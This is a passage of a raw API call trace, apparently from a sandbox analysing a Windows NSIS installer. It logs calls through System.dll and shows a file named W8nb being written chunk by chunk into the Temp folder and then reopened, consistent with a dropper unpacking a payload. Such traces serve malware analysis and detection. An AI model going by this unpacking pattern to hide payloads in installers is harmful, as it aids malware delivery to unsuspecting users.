lpString1=0x5d07b8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0030.048] lstrcpyA (in: lpString1=0x5cb910, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0030.048] lstrcpyA (in: lpString1=0x5cbd10, lpString2="GetSystemInfo" | out: lpString1="GetSystemInfo") returned="GetSystemInfo" [0030.048] GetModuleHandleA (lpModuleName="kernel32") returned 0x76bc0000 [0030.048] GetProcAddress (hModule=0x76bc0000, lpProcName="GetSystemInfo") returned 0x76bda1f0 [0030.048] lstrcpynA (in: lpString1=0x5ca488, lpString2="45285408", iMaxLength=1024 | out: lpString1="45285408") returned="45285408" [0030.048] lstrcpynA (in: lpString1=0x5ca488, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.048] GetSystemInfo (in: lpSystemInfo=0x2b30020 | out: lpSystemInfo=0x2b30020*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.048] wsprintfA (in: param_1=0x5ca488, param_2="%d" | out: param_1="45285408") returned 8 [0030.048] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.048] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.048] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.048] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.048] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.048] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.048] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.048] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.048] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.048] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.048] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.049] lstrcpynA (in: lpString1=0x5d261c, lpString2="user32::wsprintf(p r5, t '%s\\W8nb', t o)", iMaxLength=1024 | out: lpString1="user32::wsprintf(p r5, t '%s\\W8nb', t o)") returned="user32::wsprintf(p r5, t '%s\\W8nb', t o)" [0030.049] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.049] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.049] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.049] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.049] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.049] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.049] lstrcpyA (in: lpString1=0x5cb908, lpString2="user32" | out: lpString1="user32") returned="user32" [0030.049] lstrcpyA (in: lpString1=0x5cbd18, lpString2="user32" | out: lpString1="user32") returned="user32" [0030.049] lstrcpyA (in: lpString1=0x5cc118, lpString2="wsprintf" | out: lpString1="wsprintf") returned="wsprintf" [0030.049] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="%s\\W8nb", iMaxLength=1024 | out: lpString1="%s\\W8nb") returned="%s\\W8nb" [0030.049] GetModuleHandleA (lpModuleName="user32") returned 0x74500000 [0030.050] GetProcAddress (hModule=0x74500000, lpProcName="wsprintf") returned 0x0 [0030.050] lstrlenA (lpString="wsprintf") returned 8 [0030.050] GetProcAddress (hModule=0x74500000, lpProcName="wsprintfA") returned 0x7452ea00 [0030.050] lstrcpynA (in: lpString1=0x5cb908, lpString2="45285408", iMaxLength=1024 | out: lpString1="45285408") returned="45285408" [0030.050] lstrcpynA (in: lpString1=0x5cb908, lpString2="%s\\W8nb", iMaxLength=1024 | out: lpString1="%s\\W8nb") returned="%s\\W8nb" [0030.050] lstrcpynA (in: lpString1=0x5ca488, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" [0030.050] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" [0030.050] lstrcpynA (in: lpString1=0x5ca488, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.050] wsprintfA (in: param_1=0x2b30020, param_2="%s\\W8nb" | out: param_1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\W8nb") returned 41 [0030.050] lstrcpynA (in: lpString1=0x5ca488, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" [0030.050] lstrcpynA (in: lpString1=0x5ca488, lpString2="%s\\W8nb", iMaxLength=1024 | out: lpString1="%s\\W8nb") returned="%s\\W8nb" [0030.050] wsprintfA (in: param_1=0x5ca488, param_2="%d" | out: param_1="45285408") returned 8 [0030.050] FreeLibrary (hLibModule=0x5cb908) returned 0 [0030.050] lstrcpynA (in: lpString1=0x40a000, lpString2="W8nb", iMaxLength=1024 | out: lpString1="W8nb") returned="W8nb" [0030.050] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" [0030.050] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 36 [0030.050] lstrcatA (in: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\" [0030.050] lstrcatA (in: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", lpString2="W8nb" | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\W8nb") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\W8nb" [0030.050] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\W8nb" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\w8nb")) returned 0xffffffff [0030.050] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\W8nb" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\w8nb")) returned 0xffffffff [0030.050] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\W8nb" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\w8nb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0030.051] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=94374, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x170a6 [0030.051] GetTickCount () returned 0x1a1d8 [0030.051] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=56348, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdc1c [0030.051] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=79584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x136e0 [0030.051] ReadFile (in: hFile=0x1fc, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fba4, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fba4*=0x4000, lpOverlapped=0x0) returned 1 [0030.051] GetTickCount () returned 0x1a1d8 [0030.052] WriteFile (in: hFile=0x1f0, lpBuffer=0x40a8d8*, nNumberOfBytesToWrite=0x63c4, lpNumberOfBytesWritten=0x19fbb0, lpOverlapped=0x0 | out: lpBuffer=0x40a8d8*, lpNumberOfBytesWritten=0x19fbb0*=0x63c4, lpOverlapped=0x0) returned 1 [0030.053] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=94374, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x170a6 [0030.053] ReadFile (in: hFile=0x1f0, lpBuffer=0x19fbe0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x19fbe0*, lpNumberOfBytesRead=0x19fbc8*=0x4, lpOverlapped=0x0) returned 1 [0030.053] GetTickCount () returned 0x1a1d8 [0030.053] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=72732, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11c1c [0030.053] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=105124, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19aa4 [0030.053] ReadFile (in: hFile=0x1fc, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fba4, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fba4*=0x4000, lpOverlapped=0x0) returned 1 [0030.053] GetTickCount () returned 0x1a1d8 [0030.054] WriteFile (in: hFile=0x1f0, lpBuffer=0x40a8d8*, nNumberOfBytesToWrite=0x3f0d, lpNumberOfBytesWritten=0x19fbb0, lpOverlapped=0x0 | out: lpBuffer=0x40a8d8*, lpNumberOfBytesWritten=0x19fbb0*=0x3f0d, lpOverlapped=0x0) returned 1 [0030.054] ReadFile (in: hFile=0x1fc, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fba4, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fba4*=0x4000, lpOverlapped=0x0) returned 1 [0030.054] GetTickCount () returned 0x1a1d8 [0030.056] WriteFile (in: hFile=0x1f0, lpBuffer=0x40a8d8*, nNumberOfBytesToWrite=0x3f19, lpNumberOfBytesWritten=0x19fbb0, lpOverlapped=0x0 | out: lpBuffer=0x40a8d8*, lpNumberOfBytesWritten=0x19fbb0*=0x3f19, lpOverlapped=0x0) returned 1 [0030.056] ReadFile (in: hFile=0x1fc, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fba4, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fba4*=0x4000, lpOverlapped=0x0) returned 1 [0030.056] GetTickCount () returned 0x1a1d8 [0030.058] WriteFile (in: hFile=0x1f0, lpBuffer=0x40a8d8*, nNumberOfBytesToWrite=0x3f15, lpNumberOfBytesWritten=0x19fbb0, lpOverlapped=0x0 | out: lpBuffer=0x40a8d8*, lpNumberOfBytesWritten=0x19fbb0*=0x3f15, lpOverlapped=0x0) returned 1 [0030.058] ReadFile (in: hFile=0x1fc, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fba4, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fba4*=0x4000, lpOverlapped=0x0) returned 1 [0030.058] GetTickCount () returned 0x1a1e8 [0030.060] WriteFile (in: hFile=0x1f0, lpBuffer=0x40a8d8*, nNumberOfBytesToWrite=0x6162, lpNumberOfBytesWritten=0x19fbb0, lpOverlapped=0x0 | out: lpBuffer=0x40a8d8*, lpNumberOfBytesWritten=0x19fbb0*=0x6162, lpOverlapped=0x0) returned 1 [0030.060] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=94378, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x170aa [0030.060] ReadFile (in: hFile=0x1f0, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fbc8*=0x4000, lpOverlapped=0x0) returned 1 [0030.060] WriteFile (in: hFile=0x20c, lpBuffer=0x4128d8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesWritten=0x19fbc8*=0x4000, lpOverlapped=0x0) returned 1 [0030.061] ReadFile (in: hFile=0x1f0, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fbc8*=0x4000, lpOverlapped=0x0) returned 1 [0030.061] WriteFile (in: hFile=0x20c, lpBuffer=0x4128d8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesWritten=0x19fbc8*=0x4000, lpOverlapped=0x0) returned 1 [0030.061] ReadFile (in: hFile=0x1f0, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fbc8*=0x4000, lpOverlapped=0x0) returned 1 [0030.061] WriteFile (in: hFile=0x20c, lpBuffer=0x4128d8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesWritten=0x19fbc8*=0x4000, lpOverlapped=0x0) returned 1 [0030.061] ReadFile (in: hFile=0x1f0, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fbc8*=0x4000, lpOverlapped=0x0) returned 1 [0030.061] WriteFile (in: hFile=0x20c, lpBuffer=0x4128d8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesWritten=0x19fbc8*=0x4000, lpOverlapped=0x0) returned 1 [0030.061] ReadFile (in: hFile=0x1f0, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x1787, lpNumberOfBytesRead=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fbc8*=0x1787, lpOverlapped=0x0) returned 1 [0030.061] WriteFile (in: hFile=0x20c, lpBuffer=0x4128d8*, nNumberOfBytesToWrite=0x1787, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesWritten=0x19fbc8*=0x1787, lpOverlapped=0x0) returned 1 [0030.062] SetFileTime (hFile=0x20c, lpCreationTime=0x19fd8c, lpLastAccessTime=0x0, lpLastWriteTime=0x19fd8c) returned 1 [0030.062] CloseHandle (hObject=0x20c) returned 1 [0030.063] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.063] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.063] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.063] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.063] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.063] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.063] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.063] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.063] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.063] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.063] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.063] lstrcpynA (in: lpString1=0x5d1944, lpString2="kernel32::CreateFile(\x09 \x09 p \x09r5, i 0x80000000, \x09n, \x09 n,\x09 i \x09 \x09 \x093, n, n)\x09i\x09 .r10", iMaxLength=1024 | out: lpString1="kernel32::CreateFile(\x09 \x09 p \x09r5, i 0x80000000, \x09n, \x09 n,\x09 i \x09 \x09 \x093, n, n)\x09i\x09 .r10") returned="kernel32::CreateFile(\x09 \x09 p \x09r5, i 0x80000000, \x09n, \x09 n,\x09 i \x09 \x09 \x093, n, n)\x09i\x09 .r10" [0030.063] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.063] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.064] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.064] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.064] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.064] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.064] lstrcpyA (in: lpString1=0x5cb908, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0030.064] lstrcpyA (in: lpString1=0x5cbd18, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0030.064] lstrcpyA (in: lpString1=0x5cc118, lpString2="CreateFile" | out: lpString1="CreateFile") returned="CreateFile" [0030.064] GetModuleHandleA (lpModuleName="kernel32") returned 0x76bc0000 [0030.064] GetProcAddress (hModule=0x76bc0000, lpProcName="CreateFile") returned 0x0 [0030.064] lstrlenA (lpString="CreateFile") returned 10 [0030.064] GetProcAddress (hModule=0x76bc0000, lpProcName="CreateFileA") returned 0x76be6170 [0030.064] lstrcpynA (in: lpString1=0x5cb908, lpString2="45285408", iMaxLength=1024 | out: lpString1="45285408") returned="45285408" [0030.064] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.064] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.064] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.065] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.065] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.065] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\W8nb" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\w8nb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0030.065] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="3") returned 1 [0030.065] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="-2147483648") returned 11 [0030.065] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="45285408") returned 8 [0030.065] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="524") returned 3 [0030.065] lstrcpyA (in: lpString1=0x426800, lpString2="524" | out: lpString1="524") returned="524" [0030.065] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.065] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.065] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.065] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.065] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.065] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.065] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.065] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.065] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.065] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.065] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.066] lstrcpynA (in: lpString1=0x5d3b84, lpString2="*(i) p .r2", iMaxLength=1024 | out: lpString1="*(i) p .r2") returned="*(i) p .r2" [0030.066] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.066] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.066] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: 